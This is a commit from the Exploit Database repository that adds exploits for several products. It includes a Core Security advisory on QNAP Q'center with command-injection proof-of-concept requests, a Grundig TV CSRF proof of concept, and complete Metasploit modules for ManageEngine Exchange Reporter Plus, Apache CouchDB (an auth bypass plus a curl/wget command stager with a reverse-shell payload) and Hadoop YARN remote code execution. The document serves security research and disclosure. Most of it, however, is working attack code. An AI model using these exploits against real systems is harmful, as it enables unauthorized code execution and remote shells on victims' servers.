DB: 2018-07-14

10 changes to exploits/shellcodes

G DATA Total Security 25.4.0.3 - Activex Buffer Overflow

Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)

HID discoveryd - 'command_blink_on' Unauthenticated Remote Code Execution (Metasploit)
HID discoveryd - 'command_blink_on' Remote Code Execution (Metasploit)

IBM QRadar SIEM - Unauthenticated Remote Code Execution (Metasploit)
IBM QRadar SIEM - Remote Code Execution (Metasploit)
Manage Engine Exchange Reporter Plus - Remote Code Execution (Metasploit)
Apache CouchDB - Arbitrary Command Execution (Metasploit)
phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit)
Hadoop YARN ResourceManager - Unauthenticated Command Execution (Metasploit)

Dolibarr 3.2.0 < Alpha - File Inclusion
Dolibarr ERP/CRM 3.2.0 < Alpha - File Inclusion

Dolibarr ERP/CRM - OS Command Injection
Dolibarr ERP/CRM < 3.2.0 / < 3.1.1 - OS Command Injection

Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php?sondage' SQL Injection
Dolibarr ERP/CRM 3.4.0 - 'exportcsv.php?sondage' SQL Injection

Dolibarr CMS 3.5.3 - Multiple Vulnerabilities
Dolibarr ERP/CRM 3.5.3 - Multiple Vulnerabilities

Dolibarr CMS 3.0 - Local File Inclusion / Cross-Site Scripting
Dolibarr ERP/CRM 3.0 - Local File Inclusion / Cross-Site Scripting
Dolibarr ERP/CRM - '/user/index.php' Multiple SQL Injections
Dolibarr ERP/CRM - '/user/info.php?id' SQL Injection
Dolibarr ERP/CRM - '/admin/boxes.php?rowid' SQL Injection
Dolibarr ERP/CRM 3.1.0 - '/user/index.php' Multiple SQL Injections
Dolibarr ERP/CRM 3.1.0 - '/user/info.php?id' SQL Injection
Dolibarr ERP/CRM 3.1.0 - '/admin/boxes.php?rowid' SQL Injection

Dolibarr CMS 3.x - '/adherents/fiche.php' SQL Injection
Dolibarr ERP/CRM 3.x - '/adherents/fiche.php' SQL Injection

Dolibarr CMS 3.2 Alpha - Multiple Directory Traversal Vulnerabilities
Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities

Dolibarr 7.0.0 - SQL Injection
Dolibarr ERP/CRM 7.0.0 - (Authenticated) SQL Injection

Dolibarr ERP CRM  < 7.0.3 - PHP Code Injection
Dolibarr ERP/CRM  < 7.0.3 - PHP Code Injection

ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution

WAGO e!DISPLAY 7300T - Multiple Vulnerabilities
QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities
Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure
Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery
This commit is contained in:
Offensive Security 2018-07-14 05:01:50 +00:00
parent e76244b41a
commit b374aca9a3
11 changed files with 1915 additions and 15 deletions

View file

@ -0,0 +1,398 @@
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
QNAP Qcenter Virtual Appliance Multiple Vulnerabilities
1. *Advisory Information*
Title: QNAP Qcenter Virtual Appliance Multiple Vulnerabilities
Advisory ID: CORE-2018-0006
Advisory URL:
http://www.coresecurity.com/advisories/qnap-qcenter-multiple-vulnerabilities
Date published: 2018-07-11
Date of last update: 2018-07-11
Vendors contacted: QNAP
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Information Exposure [CWE-200], Command Injection [CWE-77],
Command Injection [CWE-77], Command Injection [CWE-77],
Command Injection [CWE-77]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-0706, CVE-2018-0707, CVE-2018-0708, CVE-2018-0709,
CVE-2018-0710
3. *Vulnerability Description*
QNAP's website states that:
[1] Q'center Virtual Appliance is a central management platform that
enables you to consolidate the management of multiple QNAP NAS. The
Q'center web interface gives you the ease-of-use, cost-efficiency,
convenience and flexibility to manage multiple NAS, across multiple
sites, from any internet browser.
The platform's provides centralized web-based administration to manage
the following features:
- Review HDD S.M.A.R.T. values
- Monitor system status
- Manage apps and shared folders
- Review infographice reports
Multiple vulnerabilities were found in the Q'center Virtual Appliance
web console that would allow an attacker to execute arbitrary commands
on the system.
4. *Vulnerable versions*
. Q'center Virtual Appliance Version 1.6.1056 (20170825)
. Q'center Virtual Appliance Version 1.6.1075 (20171123)
Other products and versions might be affected, but they were not tested.
5. *Vendor Information, Solutions and Workarounds*
QNAP published the following Security Note:
. https://www.qnap.com/en-us/security-advisory/nas-201807-10
6. *Credits*
These vulnerabilities were discovered and researched by Ivan Huertas
from Core Security Consulting Services. The publication of this advisory
was coordinated by Leandro Cuozzo from Core Advisories Team.
7. *Technical Description / Proof of Concept Code*
QNAP's Q'center Virtual Appliance web console includes a functionality
that would allow an authenticated attacker to elevate privileges on the
system. We describe this issue in section 7.1.
Sections 7.2, 7.3, 7.4 and 7.5 show different methods to gain command
execution.
7.1. *Privilege escalation*
[CVE-2018-0706]
The application contains an API endpoint that returns information about
the accounts defined in the database. The information returned is
informative for all the users except for the admin user, which cames
with every installation, where an extra field is presented. This extra
field (new_password) contains the password defined at installation time
for the admin user encoded in base64.
Any authenticated user could access this API endpoint and retrieve the
admin user's password, therefore being able to login as an administrator.
The following proof of concept shows a user with viewer access
retrieving the admin's password encoded in base64 in the new_password
field.
/-----
GET /qcenter/hawkeye/v1/account?_dc=1519932315271 HTTP/1.1
Host: 192.168.1.178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.178/qcenter/
Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17;
DST_ENABLE=False; user=viewer; CMS_SID=IV4P74Y16X; ROLE=1082130432;
_ID=5a9847223af7e2034924e7b6; LOGIN_TIME=1519932215818; remember=false
Connection: close
HTTP/1.1 200 OK
Date: Thu, 01 Mar 2018 19:23:43 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: application/json
Content-Length: 878
Connection: close
{
"total_count": 2,
"account": [
{
"dst_enable": false,
"name": "admin",
"default": true,
"new_password": "YWRtaW5pc3RyYWRvcg==",
"authentication": 0,
"create_time": {
"$date": 1519917983616
},
"role": 4294967295,
"timezone_code": 17,
"last_login": {
"$date": 1519929869797
},
"_id": "5a981b9f3af7e2030c883592",
"email": "",
"description": "administrator"
},
{
"dst_enable": false,
"name": "viewer",
"register_code": "",
"authentication": 0,
"create_time": {
"$date": 1519929122332
},
"role": 1082130432,
"timezone_code": 17,
"last_login": {
"$date": 1519932215818
},
"_id": "5a9847223af7e2034924e7b6",
"email": "",
"description": ""
}
]
}
-----/
As can be seen in the following excerpt, the decoded base64 data
corresponds to the plaintext administrator password set at installation
time.
/-----
$ echo YWRtaW5pc3RyYWRvcg== | base64 -d
administrador
-----/
7.2. *Command Execution in change password for the admin user*
[CVE-2018-0707]
When the admin user performs a password change, the application executes
an OS command to impact the changes. The input is not properly sanitized
when passed down to the OS, allowing an attacker to run arbitrary
commands.
/-----
POST /qcenter/hawkeye/v1/account?change_passwd HTTP/1.1
Host: 192.168.1.209
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.209/qcenter/
Content-Length: 118
Cookie: CMS_lang=ENG; user=admin; CMS_SID=TWYH7A55X5; ROLE=4294967295;
_ID=5a8465ba3af7e2030984c84e; LOGIN_TIME=1518714672547;
AUTHENTICATION=0; TIMEZONE_CODE=17; DST_ENABLE=False; remember=false
Connection: close
{"_id":"5a8465ba3af7e2030984c84e","old_password":"dGlzMzhhZWw=","new_password":"Ijt0b3VjaCAvdG1wL2NoYW5nZXBhc3M7Ig=="}
-----/
The API requires to send the password encoded in base64. This makes a
lot easier to inject command as we do not need to bypass any filters.
For the admin user in the web application, there is also a backing user
present on the OS. When a password change is requested for this user,
the values submitted to the API are included in a "sudo passwd" command,
where the injection occurs.
In this particular case, the old_password must match the current
password, which can be obtained by exploiting [CVE-2018-0706].
7.3. *Command Execution in network config update*
[CVE-2018-0708]
The admin user created at installation time can modify the network
configuration. In order to do this, the admin has to access the settings
section which is protected by the OS password (which could be obtained
using the Privilege Escalation vulnerability described above). However,
we identified that a user with the Power User profile could also execute
this function, despite access not being provided through the web
application interface. This function requires to send the admin user
password encoded in base64 in the passwd field. This value is then used
to perform a sudo operation in the OS to change the network settings. We
used the passwd field to inject command
(";touch /tmp/netconfigpower; echo "a) and create a file in /tmp/.
/-----
POST /qcenter/hawkeye/v1/network_config HTTP/1.1
Host: 192.168.1.178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.178/qcenter/
Content-Length: 87
Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17;
DST_ENABLE=False; user=power; CMS_SID=MFVG0R9SMK; ROLE=1610612735;
_ID=5a9858ad3af7e2034924e7cc; LOGIN_TIME=1519934345000; remember=false
Connection: close
{"type":"0","dns_type":"0","passwd":"Ijt0b3VjaCAvdG1wL25ldGNvbmZpZ3Bvd2VyOyBlY2hvICJh"}
-----/
The passwd parameter is used in bash echo command unsanitized.
7.4. *Command Execution in date config update*
[CVE-2018-0709]
The admin user created at installation time is capable of modifying the
date configuration. In order to do this, the admin has to access the
settings section which is protected by the OS password (which could be
obtained using the Privilege Escalation vulnerability described above).
However, we identified that a user with the Power User profile could
execute this function, despite the access is not provided through the
web application interface. This function requires to submit the admin
user password encoded in base64 in the passwd field. This value is then
used to perform a sudo operation in the OS to change the date
configuration settings. We used the passwd field to inject command
(";touch /tmp/date_config;echo"lalala) and create a file in /tmp/.
/-----
POST /qcenter/hawkeye/v1/date_config HTTP/1.1
Host: 192.168.1.178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.178/qcenter/
Content-Length: 153
Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17;
DST_ENABLE=False; user=power; CMS_SID=MFVG0R9SMK; ROLE=1610612735;
_ID=5a9858ad3af7e2034924e7cc; LOGIN_TIME=1519934345000; remember=false
Connection: close
{"listValue":18,"type":"1","datefield":1518663600000,"passwd":"Ijt0b3VjaCAvdG1wL2RhdGVfY29uZmlnO2VjaG8ibGFsYWxh","date":"20180215","time":"16:40:31"}
-----/
The passwd parameter is used in bash echo command unsanitized.
7.5. *Command Execution in SSH settings config update*
[CVE-2018-0710]
The admin user created at installation time is capable of modifying the
SSH configuration. In order to do this, the admin has to access the
settings section which is protected by the OS password (which could be
obtained using the Privilege Escalation vulnerability). However, we
identified that a user with the Power User profile could execute this
function, despite the access is not provided through the web application
interface. This function requires to submit the admin user password
encoded in base64 in the passwd field. This value is then used to
perform a sudo operation in the OS to change the date configuration
settings. We used the passwd field to inject command
("";touch /tmp/ssh; echo "lalalala) and create a file in /tmp/.
/-----
POST /qcenter/hawkeye/v1/ssh_setting_config HTTP/1.1
Host: 192.168.1.178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.178/qcenter/
Content-Length: 82
Cookie: CMS_lang=ENG; AUTHENTICATION=0; TIMEZONE_CODE=17;
DST_ENABLE=False; user=power; CMS_SID=MFVG0R9SMK; ROLE=1610612735;
_ID=5a9858ad3af7e2034924e7cc; LOGIN_TIME=1519934345000; remember=false
Connection: close
{"ssh_enable":1,"port":22,"passwd":"Ijt0b3VjaCAvdG1wL3NzaDsgZWNobyAibGFsYWxhbGE="}
-----/
The passwd parameter is used in bash echo command unsanitized.
8. *Report Timeline*
2018-03-13: Core Security sent an initial notification to QNAP,
including a draft advisory.
2018-03-14: QNAP replied that they received the draft version of the
advisory and that they would review it.
2018-03-23: Core Security requested a status update.
2018-04-10: Core Security requested a confirmation about the reported
vulnerabilities and a tentative timescale to fix them.
2018-04-12: QNAP answered saying that they were unable to reproduce the
reported vulnerabilities and asked for more detailed information to
reproduce them.
2018-04-13: Core Security sent a more detailed guide to test.
2018-04-16: QNAP confirmed reception.
2018-04-26: Core Security requested a status update.
2018-04-29: QNAP confirmed the reported vulnerabilities and informed
that their software team were working in a fixed version.
2018-05-21: Core Security requested a status update.
2018-05-28: QNAP informed that a new version of Q'center would be
release by the week of June 4.
2018-05-28: Core Security thanked for the update and proposed June 13th
as publication date.
2018-05-29: QNAP answered saying that the new Q'center release was
delayed and asked to postpone the publication a week later.
2018-05-29: Core Security asked for a solidified release date in order
to go public at the same time.
2018-06-04: QNAP informed that they didn't have a confirmed date yet.
2018-06-08: Core Security asked QNAP for a status update.
2018-06-12: QNAP notified that Q'center was under testing, for that
reason they didn't have a confirmed release date.
2018-06-25: Core Security asked again for a status update.
2018-06-27: QNAP replied that they were expecting to release their
security advisory next week Thursday or Friday.
2018-06-28: Core Security informed QNAP that recommend vendors not to
publish near the weekend and proposed Wednesday July 11th as the
publication date.
2018-07-02: Core Security asked for a confirmation about the proposed
date.
2018-06-27: QNAP confirmed July 11th as the publication date.
2018-07-11: Advisory CORE-2018-0006 published.
9. *References*
[1] https://www.qnap.com/solution/qcenter/index.php
10. *About CoreLabs*
CoreLabs, the research center of Core Security, is charged with
anticipating the future needs and requirements for information security
technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security*
Core Security provides companies with the security insight they need to
know who, how, and what is vulnerable in their organization. The
company's threat-aware, identity & access, network security, and
vulnerability management solutions provide actionable insight and
context needed to manage security risks across the enterprise. This
shared insight gives customers a comprehensive view of their security
posture to make better security remediation decisions. Better insight
allows organizations to prioritize their efforts to protect critical
assets, take action sooner to mitigate access risk, and react faster if
a breach does occur.
Core Security is headquartered in the USA with offices and operations in
South America, Europe, Middle East and Asia. To learn more, contact Core
Security at (678) 304-4500 or info@coresecurity.com
12. *Disclaimer*
The contents of this advisory are copyright (c) 2018 Core Security and
(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/

View file

@ -0,0 +1,34 @@
# Exploit Title: Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery
# Date: 2018-07-§3
# Exploit Author: Ahmethan-Gultekin - t4rkd3vilz
# Vendor Homepage: https://www.grundig.com/
# Software Link: https://play.google.com/store/apps/details?id=arcelik
# Version: Before > Smart Inter@ctive 3.0
# Tested on: Kali Linux
# CVE : CVE-2018-13989
# I'm trying my TV.I saw a Grundig remote control application on
# Google Play. Computer I downloaded and decompiled APK.
# And I began to examine individual classes. I noticed in a class
# that a request was sent during operations on the command line.
# I downloaded the phone packet viewer and opened the control application and
# made some operations. And I saw that there was such a request;
# PoC
request ->
GET /sendrcpackage?keyid=-2544&keysymbol=-4081 HTTP/1.1
Host: 192.168.1.106:8085
Connection : Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
response ->
HTTP/1.1 200 OK
Content-Type : text/plain
# Set rc key is handled for key id : -2544 key symbol : -4081
# The only requirement for the connection between the TV and the application
# was to have the same IP address. After I made the IP address on the TV
# and the phone and the IP address on the computer the same:
# I accessed the interface from the 8085 port. Now I could do anything from the computer :)

91
exploits/java/remote/45018.rb Executable file
View file

@ -0,0 +1,91 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Manage Engine Exchange Reporter Plus Unauthenticated RCE',
'Description' => %q{
This module exploits a remote code execution vulnerability that
exists in Exchange Reporter Plus <= 5310, caused by execution of
bcp.exe file inside ADSHACluster servlet
},
'License' => MSF_LICENSE,
'Author' =>
[
'Kacper Szurek <kacperszurek@gmail.com>'
],
'References' =>
[
['URL', 'https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html']
],
'Platform' => ['win'],
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [['Automatic', {}]],
'DisclosureDate' => 'Jun 28 2018',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [ true, 'The URI of the application', '/']),
Opt::RPORT(8181),
])
end
def bin_to_hex(s)
s.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join
end
def check
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'GetProductVersion')
})
unless res
vprint_error 'Connection failed'
return CheckCode::Safe
end
unless res.code == 200
vprint_status 'Target is not Manage Engine Exchange Reporter Plus'
return CheckCode::Safe
end
begin
json = res.get_json_document
raise if json.empty? || !json['BUILD_NUMBER']
rescue
vprint_status 'Target is not Manage Engine Exchange Reporter Plus'
return CheckCode::Safe
end
vprint_status "Version: #{json['BUILD_NUMBER']}"
if json['BUILD_NUMBER'].to_i <= 5310
return CheckCode::Appears
end
CheckCode::Safe
end
def exploit
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'ADSHACluster'),
'vars_post' => {
'MTCALL' => "nativeClient",
'BCP_RLL' => "0102",
'BCP_EXE' => bin_to_hex(generate_payload_exe)
}
})
end
end

317
exploits/linux/remote/45019.rb Executable file
View file

@ -0,0 +1,317 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache CouchDB Arbitrary Command Execution',
'Description' => %q{
CouchDB administrative users can configure the database server via HTTP(S).
Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB.
This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user,
including downloading and executing scripts from the public internet.
},
'Author' => [
'Max Justicz', # CVE-2017-12635 Vulnerability discovery
'Joan Touzet', # CVE-2017-12636 Vulnerability discovery
'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
],
'References' => [
['CVE', '2017-12636'],
['CVE', '2017-12635'],
['URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'],
['URL', 'http://docs.couchdb.org/en/latest/cve/2017-12636.html'],
['URL', 'https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E']
],
'DisclosureDate' => 'Apr 6 2016',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Privileged' => false,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/shell_reverse_tcp',
'CMDSTAGER::FLAVOR' => 'curl'
},
'CmdStagerFlavor' => ['curl', 'wget'],
'Targets' => [
['Automatic', {}],
['Apache CouchDB version 1.x', {}],
['Apache CouchDB version 2.x', {}]
],
'DefaultTarget' => 0
))
register_options([
Opt::RPORT(5984),
OptString.new('URIPATH', [false, 'The URI to use for this exploit to download and execute. (default is random)']),
OptString.new('HttpUsername', [false, 'The username to login as']),
OptString.new('HttpPassword', [false, 'The password to login with'])
])
register_advanced_options([
OptInt.new('Attempts', [false, 'The number of attempts to execute the payload.']),
OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp'])
])
end
def check
get_version
version = Gem::Version.new(@version)
return CheckCode::Unknown if version.version.empty?
vprint_status "Found CouchDB version #{version}"
return CheckCode::Appears if version < Gem::Version.new('1.7.0') || version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))
CheckCode::Safe
end
def exploit
fail_with(Failure::Unknown, "Something went horribly wrong and we couldn't continue to exploit.") unless get_version
version = @version
vprint_good("#{peer} - Authorization bypass successful") if auth_bypass
print_status("Generating #{datastore['CMDSTAGER::FLAVOR']} command stager")
@cmdstager = generate_cmdstager(
temp: datastore['WritableDir'],
file: File.basename(cmdstager_path)
).join(';')
register_file_for_cleanup(cmdstager_path)
if !datastore['Attempts'] || datastore['Attempts'] <= 0
attempts = 1
else
attempts = datastore['Attempts']
end
attempts.times do |i|
print_status("#{peer} - The #{i + 1} time to exploit")
send_payload(version)
Rex.sleep(5)
# break if we get the shell
break if session_created?
end
end
# CVE-2017-12635
# The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON,
# the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization
# for the newly created user.
def auth_bypass
username = datastore['HttpUsername'] || Rex::Text.rand_text_alpha_lower(4..12)
password = datastore['HttpPassword'] || Rex::Text.rand_text_alpha_lower(4..12)
@auth = basic_auth(username, password)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_users/org.couchdb.user:#{username}"),
'method' => 'PUT',
'ctype' => 'application/json',
'data' => %({"type": "user","name": "#{username}","roles": ["_admin"],"roles": [],"password": "#{password}"})
)
if res && (res.code == 200 || res.code == 201) && res.get_json_document['ok']
return true
else
return false
end
end
def get_version
@version = nil
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'authorization' => @auth
)
rescue Rex::ConnectionError
vprint_bad("#{peer} - Connection failed")
return false
end
unless res
vprint_bad("#{peer} - No response, check if it is CouchDB. ")
return false
end
if res && res.code == 401
print_bad("#{peer} - Authentication required.")
return false
end
if res && res.code == 200
res_json = res.get_json_document
if res_json.empty?
vprint_bad("#{peer} - Cannot parse the response, seems like it's not CouchDB.")
return false
end
@version = res_json['version'] if res_json['version']
return true
end
vprint_warning("#{peer} - Version not found")
return true
end
def send_payload(version)
vprint_status("#{peer} - CouchDB version is #{version}") if version
version = Gem::Version.new(@version)
if version.version.empty?
vprint_warning("#{peer} - Cannot retrieve the version of CouchDB.")
# if target set Automatic, exploit failed.
if target == targets[0]
fail_with(Failure::NoTarget, "#{peer} - Couldn't retrieve the version automaticly, set the target manually and try again.")
elsif target == targets[1]
payload1
elsif target == targets[2]
payload2
end
elsif version < Gem::Version.new('1.7.0')
payload1
elsif version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))
payload2
elsif version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0')
fail_with(Failure::NotVulnerable, "#{peer} - The target is not vulnerable.")
end
end
# Exploit with multi requests
# payload1 is for the version of couchdb below 1.7.0
def payload1
rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)
rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)
rand_db = Rex::Text.rand_text_alpha_lower(4..12)
rand_doc = Rex::Text.rand_text_alpha_lower(4..12)
rand_hex = Rex::Text.rand_text_hex(32)
rand_file = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}"
register_file_for_cleanup(rand_file)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_config/query_servers/#{rand_cmd1}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %("echo '#{@cmdstager}' > #{rand_file}")
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}"),
'method' => 'PUT',
'authorization' => @auth
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/#{rand_doc}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %({"_id": "#{rand_hex}"})
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_temp_view?limit=20"),
'method' => 'POST',
'authorization' => @auth,
'ctype' => 'application/json',
'data' => %({"language":"#{rand_cmd1}","map":""})
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_config/query_servers/#{rand_cmd2}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %("/bin/sh #{rand_file}")
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_temp_view?limit=20"),
'method' => 'POST',
'authorization' => @auth,
'ctype' => 'application/json',
'data' => %({"language":"#{rand_cmd2}","map":""})
)
end
# payload2 is for the version of couchdb below 2.1.1
def payload2
rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)
rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)
rand_db = Rex::Text.rand_text_alpha_lower(4..12)
rand_doc = Rex::Text.rand_text_alpha_lower(4..12)
rand_tmp = Rex::Text.rand_text_alpha_lower(4..12)
rand_hex = Rex::Text.rand_text_hex(32)
rand_file = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}"
register_file_for_cleanup(rand_file)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_membership"),
'method' => 'GET',
'authorization' => @auth
)
node = res.get_json_document['all_nodes'][0]
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_node/#{node}/_config/query_servers/#{rand_cmd1}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %("echo '#{@cmdstager}' > #{rand_file}")
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}"),
'method' => 'PUT',
'authorization' => @auth
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/#{rand_doc}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %({"_id": "#{rand_hex}"})
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_design/#{rand_tmp}"),
'method' => 'PUT',
'authorization' => @auth,
'ctype' => 'application/json',
'data' => %({"_id":"_design/#{rand_tmp}","views":{"#{rand_db}":{"map":""} },"language":"#{rand_cmd1}"})
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_node/#{node}/_config/query_servers/#{rand_cmd2}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %("/bin/sh #{rand_file}")
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_design/#{rand_tmp}"),
'method' => 'PUT',
'authorization' => @auth,
'ctype' => 'application/json',
'data' => %({"_id":"_design/#{rand_tmp}","views":{"#{rand_db}":{"map":""} },"language":"#{rand_cmd2}"})
)
end
def cmdstager_path
@cmdstager_path ||=
"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}"
end
end

92
exploits/linux/remote/45025.rb Executable file
View file

@ -0,0 +1,92 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Hadoop YARN ResourceManager Unauthenticated Command Execution',
'Description' => %q{
This module exploits an unauthenticated command execution vulnerability in Apache Hadoop through ResourceManager REST API.
},
'License' => MSF_LICENSE,
'Author' =>
[
'cbmixx', # Proof of concept
'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
],
'References' =>
[
['URL', 'http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf'],
['URL', 'https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn']
],
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' =>
[
['Automatic', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 19 2016',
'DefaultTarget' => 0
))
register_options([Opt::RPORT(8088)])
end
def check
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
'method' => 'POST'
)
rescue Rex::ConnectionError
vprint_error("#{peer} - Connection failed")
return CheckCode::Unknown
end
if res && res.code == 200 && res.body.include?('application-id')
return CheckCode::Detected
end
CheckCode::Safe
end
def exploit
print_status('Sending Command')
execute_cmdstager
end
def execute_command(cmd, opts = {})
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
'method' => 'POST'
)
app_id = res.get_json_document['application-id']
post = {
'application-id' => app_id,
'application-name' => Rex::Text.rand_text_alpha_lower(4..12),
'application-type' => 'YARN',
'am-container-spec' => {
'commands' => {'command' => cmd.to_s}
}
}
send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'),
'method' => 'POST',
'ctype' => 'application/json',
'data' => post.to_json
)
end
end

234
exploits/php/remote/45020.rb Executable file
View file

@ -0,0 +1,234 @@
##
